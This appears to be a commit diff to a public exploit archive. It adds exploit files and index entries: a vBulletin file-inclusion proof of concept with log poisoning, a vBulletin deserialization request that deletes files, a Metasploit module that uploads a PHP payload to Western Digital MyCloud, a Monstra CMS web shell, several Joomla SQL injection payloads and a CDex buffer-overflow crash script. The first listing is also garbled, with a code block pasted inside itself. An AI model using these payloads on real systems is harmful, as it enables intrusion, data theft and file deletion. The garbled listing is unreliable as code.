/* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT));
/* 58 */ }
/* 59 */
/* 60 */ $routing = $app->getRouter();
/* 61 */ $method = $routing->getAction();
/* 62 */ $template = $routing->getTemplate();
/* 63 */ $class = $routing->getControllerClass();
/* 64 */
/* 65 */ if (!class_exists($class))
/* 66 */ {
/* 67 */ // @todo - this needs a proper error message
/* 68 */ die("Couldn't find controller file for $class");
/* 69 */ }
/* 70 */
/* 71 */ vB5_Frontend_ExplainQueries::initialize();
/* 72 */ $c = new $class($template);
/* 73 */
/* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments());
/* 75 */
/* 76 */ vB5_Frontend_ExplainQueries::finish();
```
**Lets take a closer look on vB5_Frontend_Application::init() Listing of /includes/vb5/frontend/application.php:**
```
/* 15 */ public static function init($configFile)
/* 16 */ {
/* 17 */ parent::init($configFile);
/* 18 */
/* 19 */ self::$instance = new vB5_Frontend_Application();
/* 20 */ self::$instance->router = new vB5_Frontend_Routing();
/* 21 */ self::$instance->router->setRoutes();
/* ... */
```
We can see that setRoutes() is called:
**Listing of /includes/vb5/frontend/routing.php:**
```
/* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == /* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css')
/* 85 */ OR (strtolower(substr($path, -3)) == '.js') )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 91 */
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* 243 */
/* 244 */ vB5_ApplicationAbstract::checkState();
/* 245 */
/* 246 */ throw new vB5_Exception_404("invalid_page_url");
/* 247 */ } ) )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* … */
```
So if our routestring does not end with .gif, .png, .jpg, .css or .js and does not contain / char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay /includes/vb5/frontend/controller/relay.php:
```
/* 63 */ public function legacy($file)
/* 64 */ {
/* 65 */ $api = Api_InterfaceAbstract::instance();
/* 66 */ $api->relay($file);
/* 67 */ }
```
If we will check relay() from Api_Interface_Collapsed class /include/api/interface/collapsed.php:
```
/* 117 */ public function relay($file)
/* 118 */ {
/* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file;
/* 120 */
/* 121 */ if ($file AND file_exists($filePath))
/* 122 */ {
/* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in
/* 124 */ //index.php won't take place. If we better integrate the admincp into the
/* 125 */ //frontend, we can (and should) remove this.
/* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish'));
/* 127 */ require_once($filePath);
/* 128 */ }
/* ... */
```
As we could see an attacker is not able to use / in the $file so he cannot change current directory on Linux. But for Windows he can use \ as path delimiter and is able to specify any desired file (he can use \..\ trick as well) and it will be included by php.
![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg)
If we want to include file with extension like .gif, .png, .jpg, .css or .js we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (.) or space (%20) to the filename.
## Proof of Concept
We can check if the server is vulnerable by sending the following GET request:
```
/index.php?routestring=.\\
```
If the response is:
![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png)
The server is vulnerable.
If we want to inject a php code to any file on the server we can use the access.log for example:
```
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
```
After that we can include access.log with our PHP code:
```
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
```
![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)

117
exploits/multiple/webapps/43362.md Normal file
View file

@ -0,0 +1,117 @@
# SSD Advisory vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion
Source: https://blogs.securiteam.com/index.php/archives/3573
## Vulnerability Summary
The following advisory describes a unauthenticated deserialization vulnerability that leads to arbitrary delete files and, under certain circumstances, code execution found in vBulletin version 5.
vBulletin, also known as vB, is “a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage”.
## Credit
A security researcher from, TRUEL IT ( @truel_it ), has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVE: CVE-2017-17672
## Vulnerability details
Unsafe usage of PHPs unserialize() on user-supplied input allows an unauthenticated attacker to delete arbitrary files and, under certain circumstances, execute arbitrary code on a vBulletin installation.
vB_Library_Templates cacheTemplates() function, which is an publicly exposed API which allows to fetch information on a set of given templates from the database in order to store them inside a cache variable.
File core/vb/api/template.php function cacheTemplates():
```
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
return vB_Library::instance('template')->cacheTemplates($templates, $templateidlist, $skip_bbcode_style, $for
```
Lets take a look at $templateidlist core/vb/library/template.php function cacheTemplates():
````
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
$vboptions = vB::getDatastore()
// vB_Library_Style::switchCssStyle() may pass us a templateidlist that's already unserialized.
if (!is_array($templateidlist))
{
$templateidlist = unserialize($templateidlist);
}
foreach ($templates AS $template)
{
if (isset($templateidlist[$template]))
{
$templateids[] = intval($templateidlist[$template]);
}
}
if (!empty($templateids))
{
$temps = vB::getDbAssertor(array('title', 'textonly', 'template_un', 'template'));
// cache templates
foreach ($temps as $temp)
{
if (empty(self::$templatecache["$temp[title]"]) OR $force_set)
{
self::$templatecache["$temp[title]"] = $this;
}
}
}
if (!$skip_bbcode_style)
{
self::$bbcode_style = array(
'code' => &$templateassoc['bbcode_code_styleid'],
'html' => &$templateassoc['bbcode_html_styleid'],
'php' => &$templateassoc['bbcode_php_styleid'],
'quote' => &$templateassoc['bbcode_quote_styleid']
);
}
}
```
$temnplateidlist variable, which can come directly from user-input, is directly supplied to unserialize(), resulting in an arbitrary deserialization primitive.
## Proof of Concept
By sending the following POST request an unauthenticated attacker can delete files from the victims server
```
POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1
Host: vb533.test
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:13:"/path/to/file";}
```
The server then will respond with:
```
HTTP/1.1 200 OK
Date: Fri, 27 Oct 2017 09:27:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly
Set-Cookie: lastvisit=1509096472; path=/; HttpOnly
Set-Cookie: lastactivity=1509096472; path=/; HttpOnly
Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2101
Connection: close
Content-Type: application/json; charset=UTF-8
{"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]}
```

107
exploits/php/remote/43356.rb Executable file
View file

@ -0,0 +1,107 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :method => 'HEAD', :uri => '/web/', :pattern => [/Apache/] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Western Digital MyCloud multi_uploadify File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability found in Western Digital's MyCloud
NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php
PHP script provides multipart upload functionality that is accessible without authentication
and can be used to place a file anywhere on the device's file system. This allows an
attacker the ability to upload a PHP shell onto the device and obtain arbitrary code
execution as root.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Zenofex <zenofex[at]exploitee.rs>' # Initial vulnerability discovery, PoC, and Metasploit module
],
'References' =>
[
['URL', 'https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29'],
['URL', 'https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf'],
['URL', 'https://www.youtube.com/watch?v=EO_49pfmA5A'],
['CVE', '2017-17560']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => true,
'DisclosureDate' => 'Jul 29 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi('uri' => '/web/jquery/uploader/multi_uploadify.php')
if res.nil?
vprint_error('Connection failed')
return CheckCode::Unknown
end
if res.code == 302 && res.headers['Location'] =~ /\?status=1/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def upload(web_folder, fname, file)
# construct post data
data = Rex::MIME::Message.new
data.add_part(file, 'application/x-php', nil, "form-data; name=\"Filedata[]\"; filename=\"#{fname}\"")
# upload
res = send_request_cgi({
'method' => 'POST',
'uri' => '/web/jquery/uploader/multi_uploadify.php',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'vars_get' => {
'folder' => web_folder
}
})
end
def exploit
if check != CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, 'Target does not appear to be a vulnerable Western Digital MyCloud device')
end
# upload PHP payload to '/var/www' (webroot).
web_folder = '/var/www'
php = "<?php #{payload.encoded} ?>"
print_status("Uploading PHP payload (#{php.length} bytes) to '#{web_folder}'.")
fname = ".#{rand_text_alphanumeric(rand(10) + 6)}.php"
res = upload(web_folder, fname, php)
# check upload response
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
if res.code != 302 || res.headers['Location'] =~ /\?status=0/
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
end
print_good('Uploaded PHP payload successfully.')
# register uploaded php payload file for cleanup
register_files_for_cleanup(fname)
# retrieve and execute PHP payload
print_status("Making request for '/#{fname}' to execute payload.")
res = send_request_cgi({'uri' => normalize_uri(fname)}, 15)
end
end

61
exploits/php/webapps/43348.txt Normal file
View file

@ -0,0 +1,61 @@
Exploit Title: Monstra CMS - 3.0.4 RCE
Vendor Homepage: http://monstra.org/
Software Link:
https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: webapps
Platform: PHP
Advisory Link: https://blogs.securiteam.com/index.php/archives/3559
Description:
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a
remote command execution on the remote server.
Vulnerable Code:
https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php
line 19:
public static function main()
{
// Array of forbidden types
$forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht',
'php', 'phtml', 'php3', 'php4', 'php5',
'phps',
'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh',
'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',
'exe', 'scr', 'dll', 'msi', 'vbs', 'bat',
'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');
Proof of Concept
Steps to Reproduce:
1. Login with a valid credentials of an Editor
2. Select Files option from the Drop-down menu of Content
3. Upload a file with PHP (uppercase)extension containing the below code:
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
4. Click on Upload
5. Once the file is uploaded Click on the uploaded file and add ?cmd= to
the URL followed by a system command such as whoami,time,date etc.
Recommended Patch:
We were not able to get the vendor to respond in any way, the software
appears to have been left abandoned without support though this is not an
official status on their site (last official patch was released on
2012-11-29), the GitHub appears a bit more active (last commit from 2 years
ago).
The patch that addresses this bug is available here:
https://github.com/monstra-cms/monstra/issues/426

26
exploits/php/webapps/43350.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component JB Visa 1.0 - SQL Injection
# Dork: N/A
# Date: 17.12.2017
# Vendor Homepage: http://joombooking.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jb-visa/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_bookpro&view=popup&visatype=[SQL]
#
# 259999%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*)%2cCONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e%2c0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200%2c1)%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
#
# # # # #

26
exploits/php/webapps/43351.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection
# Dork: N/A
# Date: 17.12.2017
# Vendor Homepage: https://www.ijoomla.com/
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/guruBuy?promocode=[SQL]
#
# '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%2c@@version))%2c0)%2d%2d%200x2d
#
# # # # #

26
exploits/php/webapps/43357.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component User Bench 1.0 - SQL Injection
# Dork: N/A
# Date: 18.12.2017
# Vendor Homepage: http://www.gegabyte.org/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/user-bench/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_userbench&view=detail&userid=[SQL]
#
# %20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*)%2cCONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e%2c0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200%2c1)%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
#
# # # # #

26
exploits/php/webapps/43358.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component My Projects 2.0 - SQL Injection
# Dork: N/A
# Date: 18.12.2017
# Vendor Homepage: http://www.gegabyte.org/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php/component/myproject/VerAyari[SQL]
#
# 'and%20(select%201%20from%20(select%20count(*)%2cconcat((select(select%20concat(cast(database()%20as%20char)%2c0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20AND%20''='
#
# # # # #

27
exploits/windows/dos/43352.py Executable file
View file

@ -0,0 +1,27 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96 - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#
file="crash.txt"
crash = "A"*520 + "B"*4 #seh
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()

20
files_exploits.csv
View file

@ -5421,6 +5421,9 @@ id,file,description,date,author,type,platform,port
41612,exploits/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",dos,multiple,
41615,exploits/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow",2017-03-15,"Hossein Lotfi",dos,windows,
41620,exploits/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",dos,windows,
43352,exploits/windows/dos/43352.py,"CDex 1.96 - Buffer Overflow",2017-12-18,bzyo,dos,windows,
43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,
43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow",2017-12-18,Conviso,dos,linux,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9188,7 +9191,7 @@ id,file,description,date,author,type,platform,port
41015,exploits/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",local,windows,
41020,exploits/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,local,win_x86-64,
41021,exploits/multiple/local/41021.md,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple,
41022,exploits/linux/local/41022.txt,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux,
41022,exploits/linux/local/41022.md,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux,
41076,exploits/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",local,linux,
41090,exploits/windows/local/41090.py,"SentryHD 02.01.12e - Local Privilege Escalation",2017-01-18,"Kacper Szurek",local,windows,
41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android,
@ -9219,6 +9222,7 @@ id,file,description,date,author,type,platform,port
41605,exploits/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,local,win_x86-64,
41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -9394,6 +9398,7 @@ id,file,description,date,author,type,platform,port
43247,exploits/macos/local/43247.md,"Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43248,exploits/macos/local/43248.md,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation",2017-11-28,Lemiorhan,local,macos,
43331,exploits/linux/local/43331.txt,"glibc ld.so - Memory Leak / Buffer Overflow",2017-12-13,"Qualys Corporation",local,linux,
43345,exploits/linux/local/43345.c,"Linux kernel < 4.10.15 - Race Condition Privilege Escalation",2017-12-15,anonymous,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -15842,6 +15847,9 @@ id,file,description,date,author,type,platform,port
41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800
41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -36890,7 +36898,7 @@ id,file,description,date,author,type,platform,port
39996,exploits/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,webapps,java,
39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80
39998,exploits/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",webapps,php,80
40111,exploits/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,webapps,php,80
40111,exploits/php/webapps/40111.txt,"Joomla! Component Guru Pro - 'Itemid' SQL Injection",2016-07-14,s0nk3y,webapps,php,80
40006,exploits/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",webapps,php,80
40009,exploits/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,webapps,php,80
40010,exploits/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,webapps,php,80
@ -37627,6 +37635,11 @@ id,file,description,date,author,type,platform,port
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,
41617,exploits/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,webapps,php,
41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,
43357,exploits/php/webapps/43357.txt,"Joomla! Component User Bench 1.0 - 'userid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43358,exploits/php/webapps/43358.txt,"Joomla! Component My Projects 2.0 - SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
